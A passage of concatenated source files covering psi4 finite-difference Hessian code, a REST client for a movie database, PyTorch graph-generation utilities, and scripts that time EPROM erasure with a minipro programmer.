# psi4.core.print_out(f"\ndeleting jopts[{key}] = {jopts[key]} from jopts")
# del jopts[key]
# #except KeyError as k:
# # psi4.core.print_out("key {key} not in jopts ",k)
# psi4.core.print_out(f"\njopts has been pruned: {jopts}")
# find invalid psi4 keys in jopts dictionary and save them in a list: invalid_jopts_keys
invalid_jopts_keys = []
psi4.core.print_out("\n### start of comparing psi4 global options with jdh options")
for key in jopts.keys():
psi4.core.print_out(f"\n {key} {jopts[key]}")
try:
glob_op = psi4.core.get_global_option(key)
if key == "geom_maxiter":
local_scf_op = glob_op
psi4.core.print_out("\nInvalid SCF local key skipped")
else:
local_scf_op = psi4.core.get_local_option('SCF',key)
psi4.core.print_out(f"\njopts key = {key} - local_scf_op = {local_scf_op} - global_op = {glob_op}")
if glob_op != jopts[key]:
psi4.core.print_out(f"\njopts['{key}'] != glop_op - resetting glob_op")
psi4.core.set_global_option(key,jopts[key])
new_glob_op = psi4.core.get_global_option(key)
if key == "geom_maxiter":
new_local_scf_op = new_glob_op
psi4.core.print_out("\nInvalid SCF local key skipped")
else:
new_local_scf_op = psi4.core.get_local_option('SCF',key)
psi4.core.print_out(f"\nNOW: local_scf_op = {new_local_scf_op} - global_op = {new_glob_op}")
# check for option change
except RuntimeError as kerr:
psi4.core.print_out(f"\n{kerr}: jopts key {key} not a valid key")
invalid_jopts_keys.append(key)
psi4.core.print_out("\n++++++ End of comparing psi4 global options with jdh options")
# See what happens if we use the jopts dictionary to set the options???
# psi4.set_options(jopts)
#
# # for to in test_opts:
# # print(f"Option --{to} =",psi4.core.get_option(to))
#
# # psi4.set_options({'basis': 'aug-cc-pvdz',
# psi4.set_options({ 'basis': '6-31g**',
# 'reference': 'rhf',
# 'scf_type': 'direct',
# 'e_convergence': 10,
# 'd_convergence': 10,
# 'ints_tolerance': 10})
#
# # 'print_mos': True})
#
# # probably show check energy type and list options later??
# Get the SCF wavefunction & energies for H2O
# scf_e0, scf_wfn = psi4.energy('scf', return_wfn=True)
# print("A float and a Wavefunction object returned:", scf_e0, scf_wfn)
# setup energy_gradient options
# eg_opts = 'scf'
# print("energy/gradient options: %s" % eg_opts)
# put fixed geom data here
####################################################################
# start of some simple molecules to test lindh approx hessian idea
else:
# case 0 - set up molecular data for H-Be-H
mol_name = "H-Be-H"
# Setup atoms: at_labels, coordinates(mol_geom) and their masses (npmass)
at_label = ['H', 'Be', 'H']
d = 2.1 # Be-H bondlength in atomic units (need to check)
mol_geom = np.array(
[[0., 0., -d], [0., 0., 0., ], [0., 0., d]], dtype=float)
# orig Be =4 huh? # npmass = np.array([1., 4., 1.], dtype=float)
npmass = np.array([1., 9., 1.], dtype=float)
num_at = len(npmass)
units = "Angstrom"
############ end-of-case 0 ################
pc.pcprint("\n++++++++++++++++++++++ Molecular data for %s ++++++++++++++++++++++"
% mol_name)
pc.pcprint("====================================================================\n")
pc.pcprint("num_at in %s molecule = %d mol_geom.shape = " %
(mol_name, num_at), mol_geom.shape)
print("\n=========================================================")
# print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint(" %s --- Units = %s" % (mol_name, units))
pc.pcprint(" x y z mass")
# included atom symbol (label) in print out
for iat in range(num_at):
pc.pcprint("%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
mol_geom[iat, 0],
mol_geom[iat, 1],
mol_geom[iat, 2],
npmass[iat]))
pc.pcprint("\n=========================================================")
# calc first energy and gradient here
# ref_scf_e,ref_wavefn = psi4.energy(eg_opts, return_wfn=True)
# psi4.core.print_out("\n++++++++ ref_scf_e in main = %24.14f\n" % ref_scf_e)
# G0 = psi4.gradient(eg_opts,ref_wfn=ref_wavefn)
# gvec = np.array(G0)
#psi4.core.print_out("\n ref grad vec ->")
#psi4.core.print_out(str(gvec))
# now set up args to call hess_en_gr_fun function to get energy and gradient
# check that mol = active molecule
# mol = file_mol
mol = file_wfn
if mol == psi4.core.get_active_molecule():
psi4.core.print_out("\n mol = active mol: name = %s" % mol.name())
pc.pcprint("\n mol = active mol =",mol)
else:
mol = psi4.core.get_active_molecule()
psi4.core.print_out("\n mol set to active molecule: name = %s" % mol.name())
pc.pcprint("\n mol set to active molecule = %s" % mol)
eg_opts = 'scf'
init_coords = file_geom
init_com = np.asarray([mol.center_of_mass()[ix] for ix in range(3)])
pc.pcprint("\n in args - init_com =" + str(init_com))
num_at = len(npmass)
atom_mass = np.ones(3*num_at, dtype=float)
for ix in range(3):
atom_mass[ix::3] =npmass
mass_detscl = 1.
args = (mol, eg_opts, init_coords, init_com, atom_mass, mass_detscl, coord_type)
pc.pcprint("\n args --> \n"+ str(args))
# xdisp is the coordinate displacement (in mass wt atomic units?)
# set xdisp to zero initially
# set up energy and grad summary files
# en_sum = open("en_opt_sum.txt","w")
# grad_sum = open("grad_opt_sum.txt","w")
# print("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
# (file_wfn.molecule().name(),file_wfn.energy()), file=en_sum)
# print("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
# (file_wfn.molecule().name(),file_wfn.energy()), file=grad_sum)
# set up np arrays with energies, grad_vectors, disp_labels for ref_geom and 6*num_at displacements
nrows = 6*num_at + 1
en_array = np.zeros((nrows,2),dtype=float)
# gr_array stores the init geom gradient (ref_grad) vectors for ref geom
# and then the change in gradient for displacements (dis_grad - ref_grad)
#
gr_array = np.zeros((nrows,3*num_at),dtype=float)
dis_label = np.zeros((nrows,3),dtype=int)
fin_dif_2deriv = np.zeros((3*num_at,3*num_at),dtype=float)
# get ref energy and gradient vec at initial geom
xref = np.zeros(len(atom_mass))
ref_e,ref_grad = hess_en_gr_fun(xref, *args)
# set ref en and grad values in np arrays
en_array[0,1]=ref_e
gr_array[0,:] = ref_grad
psi4.core.print_out("\n++++++++ ref_scf_e in main = %24.14f\n" % ref_e)
psi4.core.print_out("\n ref grad vec ->")
psi4.core.print_out(str(ref_grad))
pc.pcprint("ref energy = %24.15f" % ref_e,file = en_sum)
pc.pcprint("ref grad = ",file=grad_sum)
for jat in range(num_at):
jat3 = 3 * jat
pc.pcprint("at %2d G: %14.6e %14.6e %14.6e DG: %14.6e %14.6e %14.6e "
% (jat, ref_grad[jat3], ref_grad[jat3 + 1], ref_grad[jat3 + 2],
0.,0.,0.,),
file=grad_sum)
psi4.core.print_out("\n\n++++++ Start of doing coord displacements ++++++\n\n")
# set up coordinate displacement
coor_disp = run_type_op["disp"]
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=en_sum)
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=grad_sum)
# now displace each atom in turn and calc energy and grad
plus_min = [1.,-1.]
row_cnt = 0
for iat in range(num_at):
iat3 = 3*iat
for icor in range(3):
for pm in plus_min:
row_cnt += 1
pc.pcprint("\n calc disp %3d iat = %2d ic =%d pm = %3f" % (row_cnt, iat,icor,
pm))
xdisp = np.zeros_like(xref)
xdisp[iat3+icor] += coor_disp*pm
dis_e, dis_grad = hess_en_gr_fun(xdisp, *args)
del_e = dis_e - ref_e
del_grad = dis_grad - ref_grad
dis_label[row_cnt,:] = np.array([iat,icor,int(pm)],dtype=int)
en_array[row_cnt, 0] = del_e
en_array[row_cnt, 1] = dis_e
gr_array[row_cnt,:] = del_grad
# gr_array[row_cnt, 3:6] = ref_grad
# form 2 deriv matrix
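# Central-difference assembly (describes the code below): row (iat3+icor) of the Hessian ends up as
#   H[i, :] = (grad(x + d*e_i) - grad(x - d*e_i)) / (2*d)
# relying on plus_min = [+1, -1]: the +1 pass stores dis_grad, the -1 pass subtracts it and scales by 0.5/coor_disp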
if pm > 0:
fin_dif_2deriv[iat3+icor,:] = dis_grad
else:
fin_dif_2deriv[iat3+icor,:] -= dis_grad
fin_dif_2deriv[iat3+icor] *= 0.5/coor_disp
pc.pcprint("at %2s%2d ic %d pm %3.0f E = %24.14f DE = %24.14f"
% (at_label[iat],iat,
icor,pm, dis_e,del_e), file=en_sum)
pc.pcprint("at %2d ic %d pm %3.0f " % (iat,icor,pm), file=grad_sum)
for jat in range(num_at):
jat3 = 3*jat
pc.pcprint("at %2s%2d G: %14.6e %14.6e %14.6e DG: %14.6e %14.6e %14.6e "
% (at_label[jat],jat,
dis_grad[jat3], dis_grad[jat3+1], dis_grad[jat3+2],
del_grad[jat3], del_grad[jat3+1], del_grad[ jat3+2]),
file=grad_sum)
#print("at %2d ic %d " % (iat,icor),del_grad,file=grad_sum)
# en_sum.close()
# grad_sum.close()
pc.pcprint("\n\n================== Finished doing all atom displacements "
"==================")
psi4.core.print_out("\n\n================== Finished doing all atom "
"displacements ==================")
# do sort on en_array
sorted_en = np.argsort(en_array[:,0],) # ,axis=2)
en_mean = np.mean(en_array[1:,0])
en_std = np.std(en_array[1:,0])
gnorm_mean = 0.
# print("sorted_en -->\n",sorted_en)
pc.pcprint("",file=en_sum)
pc.pcprint("+-----------------------------------------------------------+",file=en_sum)
pc.pcprint("| Sorted energies for different atom displacements |",file=en_sum)
pc.pcprint("\n| coord_type = %6s disp = %7.3f |" %
(coord_type, coor_disp), file=en_sum)
pc.pcprint("| First record should be for the reference geom |",file=en_sum)
pc.pcprint("+-----------------------------------------------------------+\n",file=en_sum)
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=en_sum)
sord = 0
for sen in sorted_en:
sord += 1
gnorm = np.sqrt(np.dot(gr_array[sen,:],gr_array[sen,:]))
if sen == 0:
pc.pcprint(" found ref molecule - skip adding grad norm to total gnorm",file=en_sum)
pc.pcprint("sen = %d and sord = %d" % (sen,sord),file=en_sum)
else:
gnorm_mean += gnorm
pc.pcprint("%2d at %2s%2d xyz %d pm %2d DE = %18.14f E = %20.14f |grad| = %15.10f"
% (sord, at_label[dis_label[sen,0]],
dis_label[sen,0],dis_label[sen,1],dis_label[sen,2],
en_array[sen,0],en_array[sen,1],gnorm),file=en_sum)
# print("order = ",sord,dis_label[sen,0],dis_label[sen,1],dis_label[sen,2])
pc.pcprint("+-----------------------------------------------------------+",file=en_sum)
pc.pcprint("| en_mean = %12.9f en_std = %12.9f gnorm_mean = %12.9f" %
(en_mean,en_std,gnorm_mean/(6*num_at)),file=en_sum)
en_sum.close()
grad_sum.close()
# print_hess to check it looks OK
# ph.print_hess(fin_dif_2deriv,prnt=True)
hsf.print_hess(fin_dif_2deriv,prnt=True)
# symmetrize hessian
for iind in range(3*num_at):
for jjnd in range(iind):
ave_hess_ij = 0.5 * (fin_dif_2deriv[iind,jjnd] + fin_dif_2deriv[jjnd,iind])
pc.pcprint("\n iind,jjnd = %d,%d hess[ii,jj] = %15.9f hess[jj,ii] = %15.9f ave_hess = %15.9f"
% (iind,jjnd,fin_dif_2deriv[iind,jjnd],fin_dif_2deriv[jjnd,iind],ave_hess_ij))
fin_dif_2deriv[iind,jjnd] = ave_hess_ij
fin_dif_2deriv[jjnd,iind] = ave_hess_ij
calc_opt_freq = True
if calc_opt_freq:
# TODO: trying to write freq to different file - needs more work on print statements before doing this
# psi4.core.close_outfile()
# output_file += "_freq"
# psi4.core.set_output_file(output_file +'.out', False)
# psi4.core.print_out(f"\n This is the frequency calc continuation for {output_file[:5]}.out")
# (0) calc frequencies from psi4 hessian wfn
# set up and analyze traditional mass_wt hessian
# add in traditional ehess frequency analysis here
pc.pcprint("\n++++ (0) Traditional atomic mass weighted freq calc using numerical diff ehess ++++\n")
# second derivative matrix nphess -> from above file_wfn read
nphess = fin_dif_2deriv
# add in ehess_type for cart or mwt_hess
if coord_type == 'cart':
ehess_type = 'cart'
elif coord_type == 'masswt':
# for mwt_hess: ehess_type should == mhess_type
# originally had: ehess_type = 'mhess'
# probably should change this
ehess_type = 'mhess'
else:
pc.pcprint("***ERROR*** coord_type = %s and not valid"% coord_type)
sys.exit()
mwt_hess, umass, atmass_gmean, inv_hess, ret_freq_type, anal_freq, \
anal_evec = hsa.hess_setup_anal(
mol_name, at_label, npmass, file_geom, nphess,
tran_rot_v=None,
hess_type='ehess',
approx_type=None,
ehess_type=ehess_type,
mhess_type='atmwt',
inv_hess=False,
get_unproj_freq=True,
get_proj_freq=True,
anal_end_freq=True,
prnt_mol_info=False)
num_at = num_file_at
mol_geom = file_geom
units = file_mol.units()
# print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint('numerical frequencies - ret_freq_type = %s\n' % ret_freq_type)
pc.pcprint(str(anal_freq) + "\n")
pc.pcprint("\n ======= End of (0) %s frequencies from psi4 hess "
"wavefn========\n\n" % mol_name)
####################################################################
pc.pcprint("\n++++++++++++++++++++++ Molecular data for %s ++++++++++++++++++++++"
% mol_name)
pc.pcprint("\n====================================================================\n")
pc.pcprint("num_at in %s molecule = %d mol_geom.shape = %s" %
(mol_name, num_file_at,str(mol_geom.shape)))
pc.pcprint("\n=========================================================")
#print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint("\n %s --- Units = %s" % (mol_name, units))
pc.pcprint("\n x y z mass")
# included atom symbol (label) in print out
for iat in range(num_file_at):
pc.pcprint("\n%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
mol_geom[iat, 0], mol_geom[iat, 1], mol_geom[iat, 2], npmass[iat]))
pc.pcprint("\n=========================================================")
psi4.core.close_outfile()
pc.prt_out_close = "close"
################################################################################
#
# Start of main routine of jdh_build_hess - for testing program
#
################################################################################
if __name__ == "__main__":
import argparse
import os
pc = Pcprint()
pc.pcprint("\n+-----------------------------------------------------------+")
pc.pcprint("\n| Start of main pgm to run/test jdh_build_hess.py |")
pc.pcprint("\n+-----------------------------------------------------------+\n")
# set up starting program
parser = argparse.ArgumentParser(
description="""
Program to build num jdh_hessian matrices using either cart or masswt coordinates.
\n 1) Use setup_psi4_npy_file to create appropriate wavefn.npy file for some molecule.
\n 2) Program checks for existence of both wavefn.npy and wavefn.json files.
\n 3) The psi4 wavefn files can be generated at the molecule's
starting or optimized equil geometry.
""")
parser.add_argument('-g','--geom',default='equil',
help = 'geom used to build hessian - options "equil" (def) or "init_pt"')
parser.add_argument('-d','--disp',type=float, default = 0.01,
help = 'num displacement in the finite differentiation (def 0.01)')
parser.add_argument('-c','--coord',default='cart',
help='coord type "cart" (def) or "masswt" used to form hessian')
parser.add_argument('-u','--coord_unit',default='angstrom',
help=' "angstrom" (def) or "bohr"')
parser.add_argument('npy_file',help='Name of wavefn file - BUT leave off .npy and .json extensions')
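# Example invocation (illustrative only; the script and file names are assumptions, and the
# wavefn .npy/.json pair must already exist, e.g. produced by setup_psi4_npy_file):
#   python jdh_build_hess.py -g equil -d 0.01 -c cart -u angstrom CH3NH2_opt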
args = parser.parse_args()
pc.pcprint("\ntype for args: "+ str(type(args)))
pc.pcprint("\nargs" + str(args))
# get working directory and look for files with mol_name
work_dir = os.getcwd()
# check that npy_files npy_file.npy and npy_file.json exist
build_hess = args.npy_file[:-4] if args.npy_file[-4:] == '.npy' else args.npy_file
fjson = build_hess+'.json'
fnpy = build_hess +'.npy'
pc.pcprint(f"debug build_hess = {build_hess} fnpy = {fnpy} and fjson = {fjson}")
# read in jdh psi4 options dictionary from build_hess
# TODO: add test that fnpy and fjson exist
# TODO: add total energy and max force of current geometry to jopts
jopts = sav_psi4opt.json_wrt_rd_dict("read", build_hess, build_hess)
pc.pcprint("\njopts dictionary - type = "+str(type(jopts))+" -->: \n" + str(jopts))
# gather argparse options for type of hessian build - save options in run_type_op
run_type_op ={}
# mol_nm = args.mol_name
# mol_nm = "CH3NH2" # TODO: get mole name from wavefn or npy_file name
mol_nm = build_hess.split("_",1)[0]
run_type_op['mol_nm'] = mol_nm
pc.pcprint("molecule name = %s" % mol_nm)
# print out other parameters
pc.pcprint("\n working with %s %s geometry" % (args.geom, mol_nm))
disp = args.disp
# rescale disp if disp > 1.
if disp >= 1.:
disp /= 100.
pc.pcprint(f"args.disp = {args.disp} - disp reset to {disp}")
coord_type = args.coord
coord_unit = args.coord_unit
pc.pcprint('\n build hessian will displace atoms by %7f bohr using coord_type = %s' % (disp,coord_type))
# run_type_op = {'mol_nm':mol_nm, 'mol_geom': mol_geom, 'disp':disp,
run_type_op = {'mol_nm': mol_nm, 'mol_geom': args.geom, 'disp':disp, 'coord_type': args.coord,
'coord_unit': coord_unit, 'npy_file': build_hess}
pc.pcprint('\narg_parse parameters converted to the run_type_op dictionary \n'+ str(run_type_op))
# call jdh_build
jdh_build_num_hess(mol_nm, run_type_op, jopts, pc=pc)
#
pc.pcprint("\n+++++++ Finished test of jdh_build_num_hess +++++++\n")
``` |
{
"source": "johndiathens/CRUD-AppiClient",
"score": 3
} |
#### File: johndiathens/CRUD-AppiClient/classMovieDB.py
```python
import json
import requests
import urllib3
class MovieDB():
def __init__(self, BaseURL, username, password, proxie1s):
self.BaseURL = BaseURL
self.proxie1s = proxie1s
self.data = "username="+username+"&password="+password
temp1 = ((requests.post(BaseURL+"api/api-token-auth/", data=self.data, verify=False , proxies=self.proxie1s, headers={'Content-Type': "application/x-www-form-urlencoded"})).text)
temp2 = json.loads(temp1)
self.myToken = "Token" + " " + temp2['token']
self.headers = {}
# self.headers['Content-Type'] = "application/json" # unnecessary when requests is called with json=data
self.headers['Authorization'] = self.myToken
print(self.headers)
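# Example usage (illustrative sketch; URL, credentials and proxy values are hypothetical):
#   db = MovieDB("https://example.com/", "myuser", "mypass", {"https": "http://proxy:8080"})
#   db.get_all()
#   db.post_director("Stanley Kubrick", "1928-07-26")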
def AppiClient(self, request_type, url, data=None):
try:
response = requests.request(request_type, url, json=data, verify=False, proxies=self.proxie1s, headers=self.headers)
return(response)
except requests.exceptions.RequestException:
print("Request can't be made.")
return None
def print_whole_category(self, table):
URL = self.BaseURL + 'api/' + table
string_print = ((self.AppiClient("GET", URL)).text).replace('},','\n')
string_print = string_print.replace('\n' , '}\n')
string_print = string_print.replace('[' , '')
string_print = string_print.replace(']' , '')
print(string_print)
def get_all(self):
print("Directors:")
self.print_whole_category('directors')
print("Actors:")
self.print_whole_category('actors')
print("Movies:")
self.print_whole_category('movies')
def get_director(self, id):
URL = self.BaseURL + 'api/directors/' + str(id)
print((self.AppiClient("GET", URL)).text)
def get_actor(self, id):
URL = self.BaseURL + 'api/actors/' + str(id)
print((self.AppiClient("GET", URL)).text)
def get_movie(self, id):
URL = self.BaseURL + 'api/movies/' + str(id)
print((self.AppiClient("GET", URL)).text)
def post_director(self, name_give, birthday_give):
payload = {'name' : name_give , 'birthday' : birthday_give}
URL = self.BaseURL + '/api/directors/'
print((self.AppiClient("POST", URL, payload)).text)
def post_actor(self, name_give, birthday_give):
payload = {'name' : name_give , 'birthday' : birthday_give}
URL = self.BaseURL + '/api/actors/'
print((self.AppiClient("POST", URL, payload)).text)
def post_movie(self, name_give, year, dir_id, act_list=None):
if self.director_exist(dir_id)==True:
flag=True
for i in act_list:
if self.actor_exist(i)==False:
print("Such actor doesn't exist.\n")
flag=False
break
if flag==True:
payload = {'name' : name_give, 'year' : year, 'director' : dir_id, 'actors' : act_list}
URL = self.BaseURL + '/api/movies/'
print((self.AppiClient("POST", URL, payload)).text)
else:
print("Such director doesn't exist.\n")
def delete_director(self, id):
URL = self.BaseURL + '/api/directors/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def delete_actor(self, id):
URL = self.BaseURL + '/api/actors/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def delete_movie(self, id):
URL = self.BaseURL + '/api/movies/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def director_exist(self, idtk):
req = self.AppiClient("GET", self.BaseURL + 'api/directors/' + str(idtk))
if (req).status_code==200:
return True
else:
return False
def actor_exist(self, idtk):
req = self.AppiClient("GET", self.BaseURL + 'api/actors/' + str(idtk))
if (req).status_code==200:
return True
else:
return False
def put_director(self , idtk , name_give , birthday_give):
payload = {"name" : name_give , "birthday" : birthday_give}
URL = self.BaseURL + '/api/directors/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
def put_actor(self , idtk , name_give , birthday_give):
payload = {"name" : name_give , "birthday" : birthday_give}
URL = self.BaseURL + '/api/actors/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
def put_movie(self , idtk , name_give , year, dir_id, act_list):
if self.director_exist(dir_id)==True:
flag=True
for i in act_list:
if self.actor_exist(i)==False:
print("Such actor doesn't exist.\n")
flag=False
break
if flag==True:
payload = {'name' : name_give, 'year' : year, 'director' : dir_id, 'actors' : act_list}
URL = self.BaseURL + '/api/movies/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
else:
print("Such director doesn't exist.\n")
def patch_director(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/directors/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
def patch_actor(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/actors/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
def patch_movie(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/movies/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
``` |
{
"source": "johnding1996/UMD-CMSC726-Project",
"score": 3
} |
#### File: johnding1996/UMD-CMSC726-Project/common.py
```python
from torch import nn
class FeedForwardNet(nn.Module):
def __init__(self, inp_dim, hidden_dim, outp_dim, n_layers, nonlinearity, dropout=0):
super().__init__()
layers = []
d_in = inp_dim
for i in range(n_layers):
module = nn.Linear(d_in, hidden_dim)
self.reset_parameters(module)
layers.append(module)
if dropout > 0:
layers.append(nn.Dropout(dropout))
if nonlinearity == 'relu':
nonlin = nn.ReLU(inplace=True)
elif nonlinearity == 'tanh':
nonlin = nn.Tanh()
elif nonlinearity == 'elu':
nonlin = nn.ELU(inplace=True)
elif nonlinearity != 'none':
raise NotImplementedError('only relu, tanh, and elu nonlinearities have been implemented')
if nonlinearity != 'none':
layers.append(nonlin)
d_in = hidden_dim
module = nn.Linear(d_in, outp_dim)
self.reset_parameters(module)
layers.append(module)
self.network = nn.Sequential(*layers)
def reset_parameters(self, module):
init_range = 0.07
module.weight.data.uniform_(-init_range, init_range)
module.bias.data.zero_()
def forward(self, x):
return self.network(x)
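# Example usage (illustrative; dimensions are arbitrary): a 2-hidden-layer ReLU MLP
#   net = FeedForwardNet(inp_dim=10, hidden_dim=64, outp_dim=2, n_layers=2, nonlinearity='relu', dropout=0.1)
#   y = net(torch.randn(32, 10))  # y.shape == (32, 2)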
```
#### File: UMD-CMSC726-Project/data/dataloader.py
```python
import torch
import networkx as nx
import numpy as np
import random
import os
import time
from utils import *
class Graph_sequence_sampler_pytorch(torch.utils.data.Dataset):
def __init__(self, G_list, max_num_node=None, max_prev_node=None, iteration=20000):
self.adj_all = []
self.len_all = []
for G in G_list:
self.adj_all.append(np.asarray(nx.to_numpy_matrix(G)))
self.len_all.append(G.number_of_nodes())
if max_num_node is None:
self.n = max(self.len_all)
else:
self.n = max_num_node
if max_prev_node is None:
print('calculating max previous node, total iteration: {}'.format(iteration))
self.max_prev_node = max(self.calc_max_prev_node(iter=iteration))
print('max previous node: {}'.format(self.max_prev_node))
else:
self.max_prev_node = max_prev_node
# self.max_prev_node = max_prev_node
# # sort Graph in descending order
# len_batch_order = np.argsort(np.array(self.len_all))[::-1]
# self.len_all = [self.len_all[i] for i in len_batch_order]
# self.adj_all = [self.adj_all[i] for i in len_batch_order]
def __len__(self):
return len(self.adj_all)
def __getitem__(self, idx):
adj_copy = self.adj_all[idx].copy()
x_batch = np.zeros((self.n, self.max_prev_node)) # here zeros are padded for small graph
x_batch[0,:] = 1 # the first input token is all ones
y_batch = np.zeros((self.n, self.max_prev_node)) # here zeros are padded for small graph
# generate input x, y pairs
len_batch = adj_copy.shape[0]
x_idx = np.random.permutation(adj_copy.shape[0])
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
adj_copy_matrix = np.asmatrix(adj_copy)
G = nx.from_numpy_matrix(adj_copy_matrix)
# then do bfs in the permuted G
start_idx = np.random.randint(adj_copy.shape[0])
x_idx = np.array(bfs_seq(G, start_idx))
## convert G's adj matrix into a BFS-ordered graph's adj matrix
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
## truncate the matrix into n*M(max_prev_node)
adj_encoded = encode_adj(adj_copy.copy(), max_prev_node=self.max_prev_node)
# get x and y and adj
# for small graph the rest are zero padded
y_batch[0:adj_encoded.shape[0], :] = adj_encoded
x_batch[1:adj_encoded.shape[0] + 1, :] = adj_encoded
return {'x':x_batch,'y':y_batch, 'len':len_batch}
def calc_max_prev_node(self, iter=20000,topk=10):
max_prev_node = []
for i in range(iter):
if i % (iter / 5) == 0:
print('iter {} times'.format(i))
adj_idx = np.random.randint(len(self.adj_all))
adj_copy = self.adj_all[adj_idx].copy()
# print('Graph size', adj_copy.shape[0])
x_idx = np.random.permutation(adj_copy.shape[0])
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
adj_copy_matrix = np.asmatrix(adj_copy)
G = nx.from_numpy_matrix(adj_copy_matrix)
# then do bfs in the permuted G
start_idx = np.random.randint(adj_copy.shape[0])
x_idx = np.array(bfs_seq(G, start_idx))
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
# encode adj
adj_encoded = encode_adj_flexible(adj_copy.copy())
max_encoded_len = max([len(adj_encoded[i]) for i in range(len(adj_encoded))])
max_prev_node.append(max_encoded_len)
max_prev_node = sorted(max_prev_node)[-1*topk:]
return max_prev_node
``` |
{
"source": "JohnDMcMaster/eetime",
"score": 2
} |
#### File: JohnDMcMaster/eetime/bin_init.py
```python
import argparse
import eetime.jl
from eetime import util
import glob
import os
import binascii
import collect
def main():
parser = argparse.ArgumentParser(
description='Display and write the initial ROM read')
util.add_bool_arg(parser,
"--hexdump",
default=False,
help="Hexdump instead of writing")
parser.add_argument('jl', help='.jl to extract (or first file if dir)')
parser.add_argument('out',
nargs="?",
default="out.bin",
help='Output binary')
args = parser.parse_args()
fn = args.jl
if os.path.isdir(fn):
fn = sorted(list(glob.glob(fn + "/*.jl")))[0]
print("Opening %s" % (fn, ))
header, _footer, _reads = eetime.jl.load_jl(fn)
if not "read" in header:
raise Exception(".jl doesn't support initial read")
buf = collect.str2fw(header["read"])
if args.hexdump:
    util.hexdump(buf, terse=True)
else:
    with open(args.out, "wb") as f:
        f.write(buf)
    print("Wrote %u bytes to %s" % (len(buf), args.out))
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/eetime/check.py
```python
from eetime.minipro import Minipro
from eetime import util
import collect
def run(prog_dev, loop=False, verbose=False):
prog = Minipro(device=prog_dev, verbose=verbose)
def check():
read_buf = prog.read()["code"]
erased, erase_percent = collect.is_erased(read_buf,
prog_dev=prog.device)
print("is_erased %u w/ erase_percent % 8.3f%%" %
(erased, erase_percent))
if loop:
while True:
check()
else:
check()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Write all bits to 0 of given device')
parser.add_argument('--device',
required=True,
help='minipro device. See "minipro -l"')
util.add_bool_arg(parser, "--verbose", default=False)
util.add_bool_arg(parser, "--loop", default=False, help="Check forever")
args = parser.parse_args()
run(args.device, loop=args.loop, verbose=args.verbose)
```
#### File: JohnDMcMaster/eetime/collect.py
```python
from eetime.util import tostr
from eetime import util
from eetime.minipro import Minipro
import json
import datetime
import time
import zlib
import binascii
import hashlib
import os
def popcount(x):
return bin(x).count("1")
def is_erased(fw, prog_dev):
# for now assume all 1's is erased
# on some devices like PIC this isn't true due to file 0 padding
set_bits = sum([popcount(x) for x in bytearray(fw)])
possible_bits = len(fw) * 8
percent = 100.0 * set_bits / possible_bits
return set_bits == possible_bits, percent
def hash8(buf):
"""Quick hash to visually indicator to user if data is still changing"""
return tostr(binascii.hexlify(hashlib.md5(buf).digest())[0:8])
def fw2str(fw):
return tostr(binascii.hexlify(zlib.compress(fw)))
def str2fw(s):
return zlib.decompress(binascii.unhexlify(s))
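# Round-trip note: .jl files store each device read as hex-encoded zlib,
# so str2fw(fw2str(buf)) == buf for any bytes object buf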
def tnow():
return datetime.datetime.utcnow().isoformat()
def check_erase(prog):
read_buf = prog.read()["code"]
erased, erase_percent = is_erased(read_buf, prog_dev=prog.device)
signature = hash8(read_buf)
print("is_erased %u w/ erase_percent % 8.3f%%, sig %s" %
(erased, erase_percent, signature))
def wait_erased(fout,
prog,
erased_threshold=20.,
interval=3.0,
prog_time=None,
passn=0,
need_passes=0,
timeout=None,
test=False,
verbose=False):
"""
erased_threshold: stop when this percent contiguous into a successful erase
Ex: if 99 iterations wasn't fully erased but 100+ was, stop at 120 iterations
interval: how often, in seconds, to read the device
"""
tstart = time.time()
# Last iteration timestamp. Used to "frame lock" reads at set interval
tlast = None
# Timestamp when EPROM was first half erased
dt_50 = None
dt_100 = None
iter = 0
nerased = 0
while True:
if tlast is not None:
while time.time() - tlast < interval:
time.sleep(0.1)
tlast = time.time()
dt_this = tlast - tstart
iter += 1
if timeout and dt_this >= timeout:
j = {
"type": "timeout",
'iter': iter,
'seconds': dt_this,
}
fout.write(json.dumps(j) + '\n')
fout.flush()
raise Exception("Timed out")
read_buf = prog.read()["code"]
erased, erase_percent = is_erased(read_buf, prog_dev=prog.device)
if erased or test:
nerased += 1
if not dt_100:
dt_100 = tlast - tstart
else:
nerased = 0
dt_100 = None
# Declare done when we've been erased for some percentage of elapsed time
complete_percent = 100.0 * nerased / iter
# Convert to more human friendly 100% scale
end_check = 100. * complete_percent / erased_threshold
